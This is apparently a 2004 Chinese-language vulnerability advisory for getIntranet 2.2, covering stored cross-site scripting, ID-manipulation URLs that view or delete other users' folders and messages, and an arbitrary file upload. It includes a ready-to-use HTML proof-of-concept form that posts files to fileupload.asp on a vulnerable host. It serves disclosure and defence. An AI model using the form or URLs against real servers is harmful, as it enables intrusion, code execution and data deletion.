GetSolutions GetIntranet多个远程输入漏洞
发布日期:2004-09-10
更新日期:2004-09-14
受影响系统:getSolutions getIntranet 2.2
描述:
BUGTRAQ ID:
11149
getIntranet是一款Intranet基于WEB的实时管理信息,文档内容等的系统。
getIntranet多个脚本对用户提交的输入缺少充分过滤,远程攻击者可以利用这个漏洞获得敏感信息,执行恶意代码,删除用户目录等攻击。
getIntranet的发送消息功能对主题和评论字段数据缺少充分过滤,提交恶意脚本代码诱使用户连接可导致恶意脚本在浏览器上执行,泄露敏感信息。
另外更改ID信息就可以查看和删除其他用户目录如:
/welcome.asp?id=30&ctype=1&lid=f30&page=folder_detail.asp
/welcome.asp?page=message.asp&id=4
/welcome.asp?action=delmessage&id=3
文件上传实现也存在漏洞,Fileupload.asp允许远程验证用户上传文件到服务器,并调用文件以WEB进程权限执行。
<*来源:Criolabs (
security@criolabs.net)
链接:
http://www.criolabs.net/advisories/getintranet.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Criolabs (
security@criolabs.net)提供了如下测试方法:
文件上传:
<form method="post" action="
http://VULNERABLEHOST/fileupload.asp" enctype="multipart/form-data" id="form1" name="form1">
<input type="hidden" name="t1" value="25"><input type="hidden" name="t2" value="13">
<input type="file" name="file" value="" size="20" class="formitem">
<textarea name="t3" size="20" class="textarea" rows="5" cols="40"></textarea>
<input type="hidden" name="t4" value="1">
<input type="hidden" name="flds" value="4"><input type="hidden" name="proc" value="sp_login_upload_write">
<input type="hidden" name="lid" value=""><input type="hidden" name="upload" value="upload"><input type="hidden" name="customer" value="">
<input type="hidden" name="page" value="login_detail.asp"><input type="hidden" name="basepage" value="welcome.asp"></td>
<input type="submit" name="Action" value="Upload" class="formitembutton">
</form>
建议:
厂商补丁:
getSolutions
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.getintranet.net/浏览次数:2738
严重程度:0(网友投票)